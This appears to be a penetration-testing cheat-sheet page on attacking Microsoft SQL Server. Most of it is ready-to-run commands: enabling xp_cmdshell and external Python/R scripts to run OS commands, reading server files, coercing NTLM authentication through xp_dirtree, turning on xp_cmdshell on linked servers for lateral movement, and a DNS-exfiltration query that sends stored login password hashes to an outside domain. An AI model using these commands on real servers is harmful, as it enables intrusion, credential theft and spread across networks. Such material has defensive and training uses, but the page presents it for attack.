MSSQL

  • Port: 1433
  • Protocol: tcp

Table of content

Tools

PowerUpSQL

PowerUpSQL is a list of PowerShell script that can be help to enumerate and interact with MSSQL database.

Get domain MSSQL databases

Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

Query a database

Get-SQLQuery -Instance "${dbIp},${dbPort}" -Query "${sqlQuery}"

mssql-cli

mssql-cli is a python CLI tool that can be used to get an interactive session with the database:

# dbName is optional
mssql-cli -S ${dbIp} -d ${dbName} -U ${username} -P ${password}

RCE

Run external script

On Azure MSSQL it is possible to run external Python or R script with the following command :

EXEC sp_execute_external_script @language = N'R',
@script = N'data.frame(print(system("cmd.exe /C whoami", intern=T)))'

Or, with a python script :

EXEC sp_configure 'show advanced options', 1 ; 
GO  
RECONFIGURE;
EXECUTE sp_configure 'external scripts enabled', 1;
GO
RECONFIGURE;
GO
EXEC sp_execute_external_script @language = N'Python' , @script = N'import subprocess;
cmd = ["whoami","ipconfig"];
a = "";
for c in cmd:
    a += subprocess.check_output(c.split(" "), shell=True).decode()+"\r\n";
a = [elt for elt in a.split("\r\n") if a.strip() != ""];
a = "\n".join(a);
print(a);
'
GO

xp_cmdshell

xp_cmdshell is a procedure that will execute a system command. It can be activated using the following commands:

EXEC sp_configure 'show advanced options', 1 ; 
GO  
RECONFIGURE;
GO    
EXEC sp_configure 'xp_cmdshell', 1  
GO   
RECONFIGURE;
GO

Then:

EXEC xp_cmdshell 'whoami';

File system enumeration

Ole Automation Procedures should be activated to access some file system procedures:

sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO

Enumerate the files

SELECT * FROM sys.dm_os_enumerate_filesystem('C:\', '*');

Read file content

SELECT * FROM OPENROWSET(BULK N'C:\Windows\win.ini', SINGLE_CLOB) AS Contents

NTLM coercion

It is possible to coerce MSSQL to perform an authenticated request against a choosen server in order to relay or catch the NetNTLM hash:

EXEC xp_dirtree '\\${ip}\foo', 1, 1

Introspection

It is possible to retrieve the currently executed SQL command with the following query:

SELECT s.TEXT FROM sys.dm_exec_requests CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS s WHERE s.TEXT LIKE '%6744j%')

DNS exfiltration

The fn_trace_gettable function can be used for DNS exfiltration.

-- The .trc is mandatory.
-- Make sure to encode your output to make it compatible with the DNS RFC
SELECT 1 FROM fn_trace_gettable('\\'+(SELECT TOP 1 password_hash from sql_logins)+'-771.d.gotraffic.fr\.trc',default))=1

Lateral Movement

MYSQL servers can be linked on to each other. Once a server is compromised, it can be possible to compromise other MSSQL instances.

The following query can be used to find linked MSSQL instances:

SELECT * FROM master..sysservers;

Likewise, PowerUpSQL can be used to automate the discovery of remote instances:

powershell Get-SQLServerLinkCrawl -Instance "${initialDbIp},1433"

Then, the remote instance can be queried using the following request:

SELECT * FROM OPENQUERY("${dbIp}", '${sqlQuery}');

It is also possible to modify the remote MSSQL parameters using the following command:

EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [${dbIp}]

References

results matching ""

    No results matching ""

    results matching ""

      No results matching ""